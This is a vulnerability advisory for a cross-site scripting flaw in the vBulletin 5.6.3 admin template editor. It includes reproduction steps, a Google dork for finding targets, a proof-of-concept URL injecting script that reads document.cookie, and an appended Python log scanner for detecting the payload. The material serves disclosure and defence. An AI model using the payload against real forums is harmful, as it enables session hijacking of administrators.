Vendor: vBulletin
By: Vincent666 ibn Winnie
CVSS: 8.8 (HIGH)
CWE: 79 (Cross Site Scripting)
Product Name: vBulletin
Affected Version From: 5.6.3
Affected Version To: 5.6.3
Patch Exists: YES
Related CWE: N/A
CPE: a:vbulletin:vbulletin:5.6.3
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2020

vBulletin 5.6.3 – ‘group’ Cross Site Scripting

vBulletin 5.6.3 contains a Cross Site Scripting vulnerability in the Admin CP template editor, reachable through the 'group' parameter of the template edit URL. To reach it, an attacker navigates to the Admin CP, clicks Styles, clicks Style Manager, chooses a theme, and chooses the action 'Add new template'. Entering '1' as both the title and the template and clicking 'Save and Reload' generates a new URL, which can be tested with different browsers. If the attacker adds a malicious script to the URL, the script executes as a Cross Site Scripting attack.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in the application. Additionally, developers should ensure that output is properly encoded before being sent to the client.

Exploit-DB raw data:

# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting
# Date: 05.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox & Opera
# Google Dorks: "Powered by vBulletin® Version 5.6.3"
# Blog: https://pentestvincent.blogspot.com/2020/11/vbulletin-563-admin-cp-multiple.html

Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
Choose "Denim" or other theme and choose action "Add new template" and
click "Go".

Put "1" in the title and "1" in the template, then "Save and Reload". Now you
can catch the new URL with HTTP Live Headers or by hand.

So, we have the URL:

https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0

Test it by hand and get cross site scripting. Use different browsers
for tests. I use Mozilla Firefox and Opera.

https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross
Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=

Picture:

https://imgur.com/a/b6gH5Fn
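
A defender-side check for the request pattern in the write-up above, as an added example that is not part of the original advisory or of vBulletin: it scans web server access logs for requests to admincp/template.php whose 'group' parameter decodes to HTML markup. It assumes combined-format access logs; the sample log lines, IP addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a value close an HTML attribute or open a tag.
MARKUP_RE = re.compile(r'[<>"\']')
ENDPOINT = "/admincp/template.php"  # path taken from the advisory URL
PARAM = "group"                     # parameter named in the advisory title


def check_line(line):
    """Return (client, decoded_value) if the line is a hit, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None  # not a parseable request line
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith(ENDPOINT):
        return None
    # parse_qsl percent-decodes each value once, as the server would.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM and MARKUP_RE.search(value):
            return client, value
    return None


def scan(lines):
    """Return all hits found in an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit]


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Sep/2020:10:00:01 +0000] "GET /admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Sep/2020:10:02:13 +0000] "GET /admincp/template.php?templateid=1&group=%22%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&expandset=&do=edit HTTP/1.1" 200 5301',
    '192.0.2.10 - - [05/Sep/2020:10:03:40 +0000] "GET /admincp/template.php?templateid=608&group=example_group&do=edit HTTP/1.1" 200 5120',
    '203.0.113.5 - - [05/Sep/2020:10:04:02 +0000] "GET /search.php?group=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} sent markup in '{PARAM}': {value!r}")
```

A hit means an administrator's browser was sent to the template editor with markup in the parameter, so the referrer and the admin session involved are the next things to review.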